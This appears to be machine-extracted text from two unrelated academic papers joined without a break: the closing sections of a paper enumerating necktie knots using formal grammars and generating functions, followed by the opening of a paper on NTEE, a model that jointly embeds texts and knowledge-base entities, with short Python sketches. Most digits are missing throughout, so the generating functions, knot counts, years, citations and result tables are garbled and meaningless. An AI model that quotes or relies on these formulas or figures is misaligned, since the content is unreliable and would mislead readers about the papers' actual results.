suppose there is such a p. consider the tie-knot ttw q− u q for some q > p/ . any decomposition such that |yz| ≤ p will be such that y and z consist of only u symbols. in particular y consists of only u symbols. hence, for sufficiently large values of i, there are too few preceding t/w-symbols to admit that tuck depth. hence the language is not regular. � hirsch et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. enumeration we can cut down the enumeration work by using some apparent symmetries. without loss of generality, we can assume that a tie-knot starts by putting the active blade in region r: any knot starting in the region l is the mirror image of a knot that starts in r and swaps all w to t and vice versa. generating functions generating functions have proven a powerful method for enumerative combinatorics. one very good overview of the field is provided by the textbooks by stanley ( ) and stanley ( ). their relevance to formal languages is based on a paper by chomsky & schützenberger ( ) that studied context-free grammars using formal power series. more details will appear in the (yet unpublished) handbook automatha (gruber, lee & shallit, ). a generating function for a series an of numbers is a formal power series a(z) = ∞ j= ajz j such that the coefficient of the degree k term is precisely ak. where ak and bk are counts of “things of size k” of type a or b respectively, the sum of the corresponding generating functions is the count of “things of size k” across both categories. if gluing some thing of type a with size j to some thing of type b with size k produces a thing of size j + k, then the product of the generating functions measures the counts of things you get by gluing things together between the two types. 
for our necktie-knot grammars, the sizes are the winding lengths of the ties, and it is clearly the case that adding a new symbol extends the size (thus is a multiplication action), and taking either one or another rule extends the items considered (thus is an additive action). the maple package combstruct has built-in functions for computing a generating function from a grammar specification. (maple is a trademark of waterloo maple inc.; the computations of generating functions in this paper were performed by using maple.) using this, and the grammars we state in 'single-depth tucks,' we are able to compute generating functions for both the winding counts and the necktie counts for both fink and mao's setting and the single-depth tuck setting.

• the generating function for fink and mao necktie-knots is
z ( + z)( − z) = z + z + z + z + z + z + z + o(z ).

• the generating function for single tuck necktie-knots is
z ( z + ) − z = z + z + z + z + z + z + z + z + , z + , z + , z + o(z ).

• by removing final states from the bnf grammar, we can compute corresponding generating functions for each of the final tuck destinations. for an r-final tuck, we remove all final states except for cru and lru, making the non-terminal symbol mandatory for all other tuck sequences. for l, we remove all but clu and rlu. for c, we remove all but rcu and lcu. this results in the following generating functions for r-final, l-final and c-final sequences, respectively.
z ( z − z + z + ) − z = z + z + z + z + z + z + z + z + z + , z + , z + o(z )
z ( z − z − ) − z = z + z + z + z + z + z + z + z + , z + , z + o(z )
z ( z − z + z + ) − z = z + z + z + z + z + z + z + z + z + , z + , z + o(z ).

• removing the references to the tuck move, we recover generating functions for the number of windings available for each tie length. we give these for r-final, l-final and c-final respectively. summed up, these simply enumerate all possible t/w-strings of the corresponding lengths, and so run through powers of .
z − z − z = z + z + z + z + z + z + z + z + z + z + z + o(z )
z ( − z)( + z) = z + z + z + z + z + z + z + z + z + z + o(z )
z − z − z = z + z + z + z + z + z + z + z + z + z + z + o(z ).

• for the full grammar of arbitrary depth knots, we set w to be a root of
( z − z )ζ + (− z + z − z )ζ + (− z + z − z + )ζ − z + z − = ,
solved for ζ. then the generating function for this grammar is
− z − z + w z − wz + w z − wz − z w + z w − w z − z + wz + w z − z − wz + w z + z − z w + z + zw − z + w −
= z + z + z + z + z + z + , z + , z + , z + , z + , z + , z + , , z + o(z ).

tables of counts

for ease of reading, we extract the results from the generating functions above to more easy-to-reference tables here. winding length throughout refers to the number of r/l/c symbols occurring, and thus is larger than the w/t count. the cases enumerated by fink & mao ( ) are

winding length    total # tie-knots

a knot with the thick blade active will cover up the entire knot with each new bow. as such, all thick blade active tie-knots will fall within the classification by fink & mao ( ). the modern case, thus, deals with thin blade active knots. as evidenced by the trinity and the eldredge knots, thin blade knots have a wider range of interesting façades and of interesting tuck patterns.
for thick blade knots, it was enough to assume that the tuck happens last, and from the c region; the thin blade knots have a far wider variety. the case remains that unless the last move is a tuck—or possibly finishes in the c region—the knot will unravel from gravity. we can thus expect this to be a valid requirement for the enumeration. there are often more valid tuck sites than the final position in a knot, and the tuck need no longer come from the c region: r and l are at least as valid. the computations in 'generating functions' establish

winding length         total
# left windings        ,
# right windings       ,
# center windings      ,
# left knots           , , ,
# right knots          , , ,
# center knots         , , ,
# single tuck knots    , , , ,
total # knots          , , , , , ,

the first point where the singly tucked knots and the full range of knots deviate is at the knots with winding length ; there are singly tucked knots, and knots that allow for a double tuck, namely:

ttttu  ttwwu  twttu  twwwu  wtttu  wtwwu  wwttu  wwwwu  ttuttu  ttuwwu  wwuttu  wwuwwu  tttwuu  ttwtuu  twttuu  twttu'uu  wtwwuu  wtwwu'uu  wwtwuu  wwwtuu

the reason for the similarity between the right and the center counts is that the winding sequences can be mirrored. left-directed knots are different since the direction corresponds to the starting direction. hence, a winding sequence for a center tuck can be mirrored to a winding sequence for a right tuck.

in the preprint version of this paper, we claimed the total count of knots using only single-depth tucks to be , . during the revision of the paper, we have discovered two errors in this claim:

1. there is an off-by-one error in this count.
2. this count was done for tie-knots that allow tucks that are hidden behind the knot.

adding this extra space to the generating grammar produces the generating function
z + z + z + z + z + z + , z + , z + , z + , z + , z + o(z )
with a total of , tie-knots with up to moves.

aesthetics

fink & mao ( ) propose several measures to quantify the aesthetic qualities of a necktie-knot; notably symmetry and balance, corresponding to the quantities #r − #l and the number of transitions from a streak of w to a streak of t or vice versa. by considering the popular thin-blade neck tie-knots, the eldredge and the trinity, as described in krasny ( a) and krasny ( b), we can immediately note that balance no longer seems to be as important for the look of a tie-knot as is the shape of its façade. symmetry still plays an important role in knots, and is easy to calculate using the clr notation for tie-knots.

knot        tw-string        clr-string        balance    symmetry
eldredge    tttwwttuttwwu    lcrlrcrlucrclu
trinity     twwwtttuttu      lclrcrlcurlu

we do not in this paper attempt to optimize any numeric measures of aesthetics, as this would require us to have a formal and quantifiable measure of the knot façades. this seems difficult with our currently available tools.
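the two aesthetic quantities just described can be computed directly from a knot's strings; the following is a small sketch (not the paper's code) that applies the definitions as stated above to the eldredge and trinity strings from the table, ignoring tuck symbols when counting streak transitions:

def symmetry(clr_string: str) -> int:
    """#r - #l over the winding sequence in clr notation."""
    s = clr_string.lower()
    return s.count('r') - s.count('l')

def balance(tw_string: str) -> int:
    """number of transitions between a streak of w moves and a streak of t moves."""
    winds = [c for c in tw_string.lower() if c in 'tw']   # drop tuck symbols (u)
    return sum(1 for a, b in zip(winds, winds[1:]) if a != b)

for name, tw, clr in [('eldredge', 'tttwwttuttwwu', 'lcrlrcrlucrclu'),
                      ('trinity', 'twwwtttuttu', 'lclrcrlcurlu')]:
    print(name, symmetry(clr), balance(tw))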
conclusion

in this paper, we have extended the enumeration methods originally used by fink & mao ( ) to provide a larger enumeration of necktie-knots, including those knots tied with the thin blade of a necktie to produce ornate patterns in the knot façade. we have found , winding patterns that take up to moves to tie and are anchored by a final single depth tuck, and thus are reasonable candidates for use with a normal necktie. we chose the number of moves by examining popular thin-blade tie-knots—the eldredge tie-knot uses moves—and by experimentation with our own neckties. most of these winding patterns allow several possible tuck patterns, and thus the , winding patterns give rise to , singly tucked tie-knots. we have further shown that in the limit, the language describing neck tie-knots is context free, with a regular sub-language describing these , knots.

these counts, as well as the stated generating functions, are dependent on the correctness of the combstruct package in maple, and the correctness of our encoding of these grammars as maple code. we have checked the small counts and generated strings for each of the grammars against experiments with a necktie and with the results by fink and mao and our own catalogue.

questions that remain open include:
• find a way to algorithmically divide a knot description string into a body/façade distinction.
• using such a distinction, classify all possible knot façades with reasonably short necktie lengths.

we have created a web-site that samples tie-knots from knots with at most moves and displays tying instructions: http://tieknots.johanssons.org. the entire website has also been deposited with figshare (vejdemo-johansson, ). all the code we have used, as well as a table with assigned names for the , winding patterns for up to moves, are provided as supplemental information to this paper. winding pattern names start with r, l or c depending on the direction of the final tuck, and then an index number within this direction. we suggest augmenting this with the bit-pattern describing which internal tucks have been added—so that, e.g., the eldredge would be l- . (including only the rd potential tuck from the start) and the trinity would be l- . (including only the nd potential tuck). thus, any single-depth tuck can be concisely addressed.

acknowledgements

we would like to thank the reviewers, whose comments have gone a long way to make this a far better paper, and who have caught several errors that marred not only the presentation but also the content of this paper. reviewer suggested a significant simplification of the full grammar in 'recursive tucks,' which made the last generating function at all computable in reasonable time and memory. reviewer suggested we look into generating functions as a method for enumerations. as can be seen in 'generating functions,' this suggestion has vastly improved both the power and ease of most of the results and calculations we provide in the paper. for these suggestions in particular and all other suggestions in general we are thankful to both reviewers.

additional information and declarations

funding
mvj was partially supported for this work by the th framework programme through the project toposys (fp -ict- -strep). the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript.

grant disclosures
the following grant information was disclosed by the authors:
th framework programme: fp -ict- -strep.
competing interests
dh and mlp are employees of upstanding hackers inc.

author contributions
• dan hirsch and anders sandberg analyzed the data, wrote the paper, and reviewed drafts of the paper.
• ingemar markström analyzed the data, performed the computation work, and reviewed drafts of the paper.
• meredith l. patterson analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, and reviewed drafts of the paper.
• mikael vejdemo-johansson analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, and reviewed drafts of the paper.

data deposition
the following information was supplied regarding the deposition of related data:
figshare: http://dx.doi.org/ . /m .figshare. .

supplemental information
supplemental information for this article can be found online at http://dx.doi.org/ . /peerj-cs. #supplemental-information.

references
chomsky n, schützenberger mp. . the algebraic theory of context-free languages. studies in logic and the foundations of mathematics : – .
fink t, mao y. . designing tie knots by random walks. nature ( ): – doi . / .
fink t, mao y. . tie knots, random walks and topology. physica a: statistical mechanics and its applications ( ): – doi . /s - ( ) - .
fink t, mao y. . the ways to tie a tie. london: fourth estate.
gruber h, lee j, shallit j. . enumerating regular expressions and their languages. arxiv preprint arxiv: . .
knorr a. . eldredge reloaded. http://xirdalium.net [blog post]. available at http://xirdalium.net/ / / /eldredge-reloaded/ (accessed december ).
krasny a. a. eldredge tie knot—how to tie a eldredge necktie knot. http://agreeordie.com [blog post]. available at http://agreeordie.com/blog/musings/ -how-to-tie-a-necktie-eldredge-knot (accessed december ).
krasny a. b. trinity tie knot—how to tie a trinity necktie knot. http://agreeordie.com [blog post]. available at http://agreeordie.com/blog/musings/ -how-to-tie-a-necktie-trinity-knott (accessed december ).
sipser m. . introduction to the theory of computation. vol. . boston: thomson course technology.
stanley rp. . enumerative combinatorics, cambridge studies in advanced mathematics, vol. . cambridge: cambridge university press.
stanley rp. . enumerative combinatorics, cambridge studies in advanced mathematics, vol. . cambridge: cambridge university press.
vejdemo-johansson m. . random tie knots webpage. available at http://dx.doi.org/ . /m .figshare. (accessed february ).
wachowski a, wachowski l, silver j, reeves k, fishburne l, moss c, weaving h, smith j, foster g, perrineau h, et al. . the matrix reloaded [film]. usa: warner bros. pictures.
learning distributed representations of texts and entities from knowledge base

ikuya yamada (ikuya@ousia.jp), hiroyuki shindo (shindo@is.naist.jp), hideaki takeda (takeda@nii.ac.jp), yoshiyasu takefuji (takefuji@sfc.keio.ac.jp)
studio ousia, japan; nara institute of science and technology, japan; national institute of informatics, japan; keio university, japan

transactions of the association for computational linguistics, vol. , pp. – . action editor: kristina toutanova. submission batch: / ; revision batch: / ; published / . © association for computational linguistics. distributed under a cc-by . license.

abstract

we describe a neural network model that jointly learns distributed representations of texts and knowledge base (kb) entities. given a text in the kb, we train our proposed model to predict entities that are relevant to the text. our model is designed to be generic with the ability to address various nlp tasks with ease. we train the model using a large corpus of texts and their entity annotations extracted from wikipedia. we evaluated the model on three important nlp tasks (i.e., sentence textual similarity, entity linking, and factoid question answering) involving both unsupervised and supervised settings. as a result, we achieved state-of-the-art results on all three of these tasks. our code and trained models are publicly available for further academic research (https://github.com/studio-ousia/ntee).

introduction

methods capable of learning distributed representations of arbitrary-length texts (i.e., fixed-length continuous vectors that encode the semantics of texts), such as sentences and paragraphs, have recently attracted considerable attention (le and mikolov, ; kiros et al., ; li et al., ; wieting et al., ; hill et al., b; kenter et al., ). these methods aim to learn generic representations that are useful across domains, similar to word embedding methods such as word2vec (mikolov et al., b) and glove (pennington et al., ).

another interesting approach is learning distributed representations of entities in a knowledge base (kb) such as wikipedia and freebase. these methods encode information of entities in the kb into a continuous vector space. they are shown to be effective for various kb-related tasks such as entity search (hu et al., ), entity linking (hu et al., ; yamada et al., ), and link prediction (bordes et al., ; wang et al., ; lin et al., ).

in this paper, we describe a novel method to bridge these two different approaches. in particular, we propose neural text-entity encoder (ntee), a neural network model to jointly learn distributed representations of texts (i.e., sentences and paragraphs) and kb entities. for every text in the kb, our model aims to predict its relevant entities, and places the text and the relevant entities close to each other in a continuous vector space. we use human-edited entity annotations obtained from wikipedia (see table ) as supervised data of relevant entities to the texts containing these annotations.

note that kb entities have been conventionally used to model semantics of texts. a representative example is explicit semantic analysis (esa) (gabrilovich and markovitch, ), which represents the semantics of a text using a sparse vector space, where each dimension corresponds to the relevance score of the text to each entity. essentially, esa shows that text can be accurately represented using a small set of its relevant entities.
based on this fact, we hypothesize that we can use the annotations of relevant entities as the supervised data of learning text representations. (entity annotations in wikipedia can be viewed as supervised data of relevant entities because wikipedia instructs its contributors to create annotations only where they are relevant; see https://en.wikipedia.org/wiki/wikipedia:manual_of_style.) furthermore, we also consider that placing texts and entities into the same vector space enables us to easily compute the similarity between texts and entities, which can be beneficial for various kb-related tasks.

in order to test this hypothesis, we conduct three experiments involving both the unsupervised and the supervised tasks. first, we use standard semantic textual similarity datasets to evaluate the quality of the learned text representations of our method in an unsupervised fashion. as a result, our method clearly outperformed the state-of-the-art methods. furthermore, to test the effectiveness of our method to perform kb-related tasks, we address the following two important problems in the supervised setting: entity linking (el) and factoid question answering (qa). in both tasks, we adopt a simple multi-layer perceptron (mlp) classifier with the learned representations as features. we tested our method using two standard datasets (i.e., conll and tac ) for the el task and a popular factoid qa dataset based on the quiz bowl quiz game for the factoid qa task. as a result, our method outperformed recent state-of-the-art methods on both the el and the factoid qa tasks.

additionally, there have also been proposed methods that map words and entities into the same continuous vector space (wang et al., ; yamada et al., ; fang et al., ). our work differs from these works because we aim to map texts (i.e., sentences and paragraphs) and entities into the same vector space.

our contributions are summarized as follows:
• we propose a neural network model that jointly learns vector representations of texts and kb entities. we train the model using a large amount of entity annotations extracted directly from wikipedia.
• we demonstrate that our proposed representations are surprisingly effective for various nlp tasks. in particular, we apply the proposed model to three different nlp tasks, namely semantic textual similarity, entity linking, and factoid question answering, and achieve state-of-the-art results on all three tasks.
• we release our code and trained models to the community at https://github.com/studio-ousia/ntee to facilitate further academic research.

the lord of the rings is an epic high-fantasy novel written by english author j. r. r. tolkien.
entity annotations: the lord of the rings, epic (genre), high fantasy, j. r. r. tolkien
table : an example of a sentence with entity annotations.

our approach

in this section, we propose our approach of learning distributed representations of texts and entities in kb.

model

given a text t (a sequence of words w_1, ..., w_N), we train our model to predict entities e_1, ..., e_n that appear in t.
formally, the probability that represents the likelihood of an entity e appearing in t is defined as the following softmax function:

p(e|t) = exp(v_e^T v_t) / Σ_{e′∈E_KB} exp(v_e′^T v_t),    (1)

where E_KB is a set of all entities in kb, and v_e ∈ R^d and v_t ∈ R^d are the vector representations of the entity e and the text t, respectively. we compute v_t using the element-wise sum of word vectors in t with l2 normalization and a fully connected layer. letting v_s denote the sum of the word vectors (v_s = Σ_{i=1}^{N} v_{w_i}), v_t is computed as follows:

v_t = W (v_s / ‖v_s‖) + b,    (2)

where W ∈ R^{d×d} is a weight matrix, and b ∈ R^d is a bias vector. here, we initialize v_w and v_e using the pre-trained representations described in the next section. the loss function of our model is defined as follows:

L = − Σ_{(t,E_t)∈Γ} Σ_{e∈E_t} log p(e|t),    (3)

where Γ denotes a set of pairs, each of which consists of a text t and its entity annotations E_t in kb.

one problem in training our model is that the denominator in eq. (1) is computationally very expensive because it involves summation over all entities in kb. we address this problem by replacing E_KB in eq. (1) with E*, which is the union of the positive entity e and k randomly chosen negative entities that do not appear in t. this method can be viewed as negative sampling (mikolov et al., b) with a uniform negative distribution. in addition, because the length of a text t is arbitrary in our model, we test the following two settings: t as a paragraph, and t as a sentence.

parameters

the parameters to be learned by our model are the vector representations of words and entities in our vocabulary v, the weight matrix W, and the bias vector b. consequently, the total number of parameters in our model is |v| × d + d² + d.

we initialize the representations of words and entities using pre-trained representations to reduce the training time. we use the skip-gram model of word2vec (mikolov et al., a; mikolov et al., b) with negative sampling trained with wikipedia articles. in order to create a corpus for the skip-gram model from wikipedia, we simply replace the name of each entity annotation in wikipedia articles with the unique identifier of the entity the annotation refers to. this simple method enables us to easily train the distributed representations of words and entities simultaneously. we used a wikipedia dump generated in july ; the dump was downloaded from wikimedia downloads (https://dumps.wikimedia.org/). for the hyper-parameters of the skip-gram model, we used standard parameters such as the context window size being , and the size of negative samples being . we used the python word2vec implementation in gensim (https://radimrehurek.com/gensim/). additionally, the entity representations were normalized to unit length before they were used as the pre-trained representations. we use the open-source apache opennlp to detect sentences.

corpus

we trained our model by using the english dbpedia abstract corpus (brümmer et al., ), an open corpus of wikipedia texts with entity annotations manually created by wikipedia contributors. it was extracted from the first introductory sections of . million wikipedia articles. we train our model by iterating over the texts and their entity annotations in the corpus.

we used words that appear five times or more and entities that appear three times or more in the corpus, and simply ignored the other words and entities. as a result, our vocabulary v consisted of , words and , entities. further, the number of valid words and entity annotations were approximately million and million, respectively.
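as a rough illustration of the scoring function and the negative-sampling objective described in 'model' above, the following is a minimal numpy sketch with toy sizes and randomly initialized arrays standing in for the pre-trained skip-gram vectors; it is not the authors' theano implementation.

import numpy as np

d = 300                                               # embedding dimensionality, chosen here for illustration
rng = np.random.default_rng(0)
word_emb = rng.normal(scale=0.1, size=(10000, d))     # stand-in for the word vectors v_w
entity_emb = rng.normal(scale=0.1, size=(50000, d))   # stand-in for the entity vectors v_e
W = rng.normal(scale=0.1, size=(d, d))                # fully connected layer
b = np.zeros(d)

def encode_text(word_ids):
    """v_t = W (v_s / ||v_s||) + b, where v_s is the sum of the word vectors (eq. (2))."""
    v_s = word_emb[word_ids].sum(axis=0)
    return W @ (v_s / np.linalg.norm(v_s)) + b

def negative_sampling_loss(word_ids, positive_entity, negative_entities):
    """-log p(e|t), with E_KB in eq. (1) replaced by the positive entity plus k sampled negatives."""
    v_t = encode_text(word_ids)
    candidates = np.concatenate(([positive_entity], negative_entities))
    logits = entity_emb[candidates] @ v_t             # dot products v_e^T v_t
    log_probs = logits - np.log(np.exp(logits).sum())
    return -log_probs[0]                              # the positive entity sits at index 0

# toy usage: a five-word text, one annotated entity, and a handful of sampled negatives
loss = negative_sampling_loss(np.array([1, 5, 42, 7, 9]), 3, rng.integers(0, 50000, size=30))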
additionally, we also introduce one heuristic method to generate entity annotations. for each text, we add a pseudo-annotation that points to the entity of which the kb page is the source of the text. because every kb page describes its corresponding entity, it typically contains many mentions referring to the entity. however, because hyper-linking to the web page itself does not make sense, these kinds of mentions cannot be observed as annotations in wikipedia. therefore, we use the aforementioned heuristic method to address this problem.

other details

our model has several hyper-parameters. following kenter et al. ( ), the number of dimensions we used was d = . the mini-batch size was fixed at , the size of negative samples k was set to , and the training consisted of one epoch. the model was implemented using python and theano (theano development team, ). the training took approximately six days using a nvidia k gpu. we trained the model using stochastic gradient descent (sgd), and its learning rate was controlled by rmsprop (tieleman and hinton, ).

(the dbpedia abstract corpus also includes annotations that are generated using heuristics. we did not use these pseudo-annotations and used only the entity annotations that were created by wikipedia contributors.)

experiments

in order to evaluate our model presented in the previous section, we conduct experiments on three important nlp tasks using the representations learned by our model. first, we conduct an experiment on a semantic textual similarity task in order to evaluate the quality of the learned text representations. next, we conduct experiments on two important nlp problems (i.e., el and factoid qa) in order to test the effectiveness of our proposed representations as features for downstream nlp tasks. finally, we further qualitatively analyze the learned representations. note that we separately describe how we address each task using our representations in the subsection of each experiment.

semantic textual similarity

semantic textual similarity aims to test how well a model reflects human judgments of the semantic similarity between two sentence pairs. the task has been used as a standard method to evaluate the quality of distributed representations of sentences in past work (kiros et al., ; hill et al., a; kenter et al., ).

setup

our experimental setup follows that of a previously published experiment (hill et al., a). we use two standard datasets: (1) the sts dataset (agirre et al., ), consisting of , sentence pairs and human ratings from six different sources (e.g., newswire, web forums, dictionary glosses), and (2) the sick dataset (marelli et al., ), consisting of , pairs of sentences and human ratings. in both datasets, the ratings take values between and , where a rating of indicates that the sentence pair is not related, and a rating of means that they are highly related. all sentence pairs except the sick trial pairs were used for our experiments.

we train our model by experimenting with both paragraphs and sentences. further, we introduce another training setting (denoted by fixed ntee), where the parameters in the word representations and the entity representations are fixed throughout the training.

we compute the cosine distance between the vectors of the two sentences in each sentence pair (derived using eq. (2)) and measure the pearson's r and spearman's ρ correlations between these distances and the gold-standard human ratings. additionally, we use pearson's r as our primal score.
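this evaluation protocol can be sketched in a few lines (an illustrative snippet, not the authors' evaluation code; encode_text stands for the text encoder of eq. (2), and the sentence pairs and ratings are placeholders for the sts/sick data):

import numpy as np
from scipy.stats import pearsonr, spearmanr

def cosine(u, v):
    return float(u @ v / (np.linalg.norm(u) * np.linalg.norm(v)))

def evaluate(sentence_pairs, gold_ratings, encode_text):
    """score each pair by cosine similarity of its encoded sentences and correlate with gold ratings."""
    scores = [cosine(encode_text(a), encode_text(b)) for a, b in sentence_pairs]
    return pearsonr(gold_ratings, scores)[0], spearmanr(gold_ratings, scores)[0]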
baselines

for baselines for this experiment, we selected the following four recent state-of-the-art models. brief descriptions of these models are as follows:

• word2vec (mikolov et al., a; mikolov et al., b) is a popular word embedding model. we compute a sentence representation by element-wise addition of the vectors of its words (mitchell and lapata, ). we add its skip-gram and cbow models to our baselines. we train the model with the hyper-parameters and the wikipedia corpus explained in section . thus, the skip-gram model is equivalent to the pre-trained representations used in our model. furthermore, in order to conduct a fair comparison between the skip-gram model and our model, we also add skip-gram (plain), which is a skip-gram model trained using a different corpus. in particular, the corpus is augmented using the texts in the dbpedia abstract corpus (we augment the corpus simply by appending the texts in the dbpedia abstract corpus to the wikipedia corpus), and its entity annotations are treated as regular text phrases (not replaced by their unique identifiers).

• skip-thought (kiros et al., ) is a model that is trained to predict adjacent sentences given each sentence in a corpus. sentences are encoded using a recurrent neural network (rnn) with gated recurrent units (gru).

• siamese cbow (kenter et al., ) is a model that aims to predict sentences occurring next to each other in a corpus. a sentence representation is derived using a vector average of words in the sentence.

for these baselines, we obtain a score of a sentence pair by using the cosine distance between the sentence representations of the pair.

name                      sts                                                       sick
                          news    forum   onwn    twitter  images  headlines
ntee (sentence)           . /.    . /.    . /.    . /.     . /.    . /.          . /.
ntee (paragraph)          . /.    . /.    . /.    . /.     . /.    . /.          . /.
fixed ntee (sentence)     . /.    . /.    . /.    . /.     . /.    . /.          . /.
fixed ntee (paragraph)    . /.    . /.    . /.    . /.     . /.    . /.          . /.
skip-gram                 . /.    . /.    . /.    . /.     . /.    . /.          . /.
skip-gram (plain)         . /.    . /.    . /.    . /.     . /.    . /.          . /.
cbow                      . /.    . /.    . /.    . /.     . /.    . /.          . /.
skip-thought              . /.    . /.    . /.    . /.     . /.    . /.          . /.
siamese cbow              . /.    . /.    . /.    . /.     . /.    . /.          -

table : pearson's r and spearman's ρ correlations of our models with the state-of-the-art models on the semantic textual similarity task. best scores, in terms of r, are marked in bold.

results

table shows our experimental results with the baseline methods. we obtained the scores of skip-thought from hill et al. ( a) and those of siamese cbow from kenter et al. ( ). our ntee models were able to outperform the state-of-the-art models in all datasets in terms of pearson's r. moreover, our fixed ntee models outperformed the ntee models in several datasets and the skip-gram models in all datasets. further, our model trained with sentences consistently outperformed the model trained with paragraphs. additionally, the skip-gram models performed mostly similarly regardless of the difference of their corpus. note that, because we fix the word representations and the entity representations during the training of the fixed ntee models, the difference between the fixed ntee models and the skip-gram model is merely the presence of the learned fully connected layer.
because our model places a text representation and the representations of its relevant entities close to each other, the function of the layer can be recognized as an affine transformation from the word-based text representation to the entity-based text representation. we consider that the reason why the fixed ntee model performed well among datasets is that the entity-based text representations are more semantic (less syntactic) and contain less noise than the word-based text representations, and thus are much more suitable for addressing this task.

entity linking

entity linking (el) (cucerzan, ; mihalcea and csomai, ; milne and witten, ; ratinov et al., ; hajishirzi et al., ; ling et al., ) is the task of resolving ambiguous mentions of entities to their referent entities in kb. el has recently received considerable attention because of its effectiveness in various nlp tasks such as information extraction and semantic search. the task is challenging because of the ambiguity in the meaning of entity mentions (e.g., "washington" can refer to the state, the capital of the us, the first us president george washington, and so forth). the key to improving the performance of el is to accurately model the semantic context of entity mentions. because our model learns the likelihood of an entity appearing in a given text, it can naturally be used for modeling the context of el.

setup

our experimental setup follows the setup described in past work (chisholm and hachey, ; he et al., ; yamada et al., ). we use two standard datasets: the conll dataset and the tac dataset.

the conll dataset, which was proposed in hoffart et al. ( ), includes training, development, and test sets consisting of , , and documents, respectively. we use the training set to train our el method, and the test set for measuring the performance of our method. we report the standard micro- (aggregates over all mentions) and macro- (aggregates over all documents) accuracies of the top-ranked candidate entities.

the tac dataset is another dataset constructed for the text analysis conference (tac, http://www.nist.gov/tac/) (ji et al., ). the dataset comprises training and test sets containing , and , documents, respectively. we use mentions only with a valid entry in the kb, and report the micro-accuracy score of the top-ranked candidate entities. we evaluate our method on , mentions contained in the test set. further, we randomly select % of the documents from the training set, and use these documents as a development set.

additionally, we collected two measures that have frequently been used in past el work: entity popularity and prior probability. the entity popularity of an entity e is defined as log(|A_{e,*}| + 1), where A_{e,*} is the set of kb anchors that point to e. the prior probability of mention m referring to entity e is defined as |A_{e,m}| / |A_{*,m}|, where A_{*,m} represents all kb anchors with the same surface as m, and A_{e,m} is the subset of A_{*,m} that points to e. these two measures were collected directly from the same wikipedia dump described in section .
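both measures can be computed from a collection of (anchor surface, target entity) pairs harvested from the kb; the following is a small sketch with an assumed input format (not the authors' code):

import math
from collections import Counter

def anchor_statistics(anchors):
    """anchors: iterable of (surface, entity) pairs extracted from kb anchor links."""
    anchors = list(anchors)
    by_entity = Counter(e for _, e in anchors)     # |A_{e,*}|
    by_surface = Counter(s for s, _ in anchors)    # |A_{*,m}|
    by_pair = Counter(anchors)                     # |A_{e,m}|

    def popularity(e):
        return math.log(by_entity[e] + 1)          # log(|A_{e,*}| + 1)

    def prior(m, e):
        return by_pair[(m, e)] / by_surface[m] if by_surface[m] else 0.0

    return popularity, prior

# toy usage with a handful of anchors
pop, prior = anchor_statistics([('washington', 'washington (state)'),
                                ('washington', 'george washington'),
                                ('washington', 'george washington')])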
our method

following past work, we address the el task by solving two sub-tasks: candidate generation and mention disambiguation.

candidate generation

in candidate generation, candidates of referent entities are generated for each mention. we use the candidate generation method proposed in yamada et al. ( ) for the sake of compatibility with their state-of-the-art results. in particular, we use a public dataset proposed in pershina et al. ( ) for the conll dataset. for the tac dataset, we use a dictionary that is directly built from the wikipedia dump explained in section . we retrieved possible mention surfaces of an entity from (1) the title of the entity, (2) the title of another entity redirecting to the entity, and (3) the names of anchors that point to the entity. furthermore, to improve the recall, we also tokenize the title of each entity and treat the resulting tokens as possible mention surfaces of the corresponding entity. we sort the entity candidates according to their entity popularities, and retain the top candidates for computational efficiency. the recall of the candidate generation was . % and . % on the test sets of the conll and tac datasets, respectively.

mention disambiguation

we address the mention disambiguation task using a multi-layer perceptron (mlp) with a single hidden layer. figure shows the architecture of our neural network model. the model selects an entity from among the entity candidates for each mention m in a document t. for each entity candidate e, we input the vector of the entity v_e, the vector of the document v_t (computed with eq. (2)), the dot product of v_e and v_t, and the small number of features for el described below. (note that the dot product represents the unnormalized likelihood that e appears in t; see eq. (1). we also tested using the cosine similarity rather than the dot product, but it slightly degraded the performance in the el task and the factoid qa task described below. further, we normalized v_e to unit length because of its overall higher accuracy.) on top of these features, we stack a hidden layer with nonlinearity using rectified linear units (relu) and dropout. we also add an output layer onto the hidden layer and select the most relevant entity using softmax over the entity candidates.

similar to past work (chisholm and hachey, ; yamada et al., ), we include a small number of features in our model. first, we use the following three standard el features: the entity popularity of e, the prior probability of m referring to e, and the maximum prior probability of e of all mentions in t. in addition, we optionally add features representing string similarities between the title of e and the surface of m (meij et al., ; yamada et al., ). these similarities include whether the title of e exactly equals or contains the surface of m, and whether the title of e starts or ends with the surface of m.

we tuned the following two hyper-parameters using the micro-accuracy on the development set of each dataset: the number of units in the hidden layer and the dropout probability. the results are listed in table . further, we trained the model by using stochastic gradient descent (sgd). the learning rate was controlled by rmsprop, and the mini-batch size was set to . we also used the micro-accuracy on the development set to locate the best epoch for testing.

figure : architecture of our neural network for el and qa tasks.
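the candidate-scoring network just described can be sketched as follows (a toy numpy illustration of the inference pass with assumed shapes, not the authors' implementation): for each candidate entity of a mention, the entity vector, the document vector, their dot product, and the hand-crafted el features are concatenated, passed through a relu hidden layer, and the candidates are compared with a softmax.

import numpy as np

rng = np.random.default_rng(0)

def relu(x):
    return np.maximum(x, 0.0)

def init_mlp(feature_dim, hidden_units):
    """single hidden layer plus a scalar output score per candidate."""
    return {'W1': rng.normal(scale=0.1, size=(feature_dim, hidden_units)),
            'b1': np.zeros(hidden_units),
            'W2': rng.normal(scale=0.1, size=(hidden_units, 1)),
            'b2': np.zeros(1)}

def candidate_probabilities(params, v_doc, candidate_vecs, el_features):
    """softmax over the entity candidates of a single mention."""
    feats = np.stack([np.concatenate([v_e, v_doc, [v_e @ v_doc], f])
                      for v_e, f in zip(candidate_vecs, el_features)])
    hidden = relu(feats @ params['W1'] + params['b1'])   # dropout would be applied here during training
    scores = (hidden @ params['W2'] + params['b2']).ravel()
    scores -= scores.max()                               # numerical stability
    p = np.exp(scores)
    return p / p.sum()

in training, the candidate annotated as the gold referent entity would serve as the softmax target, with dropout applied to the hidden layer as described above.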
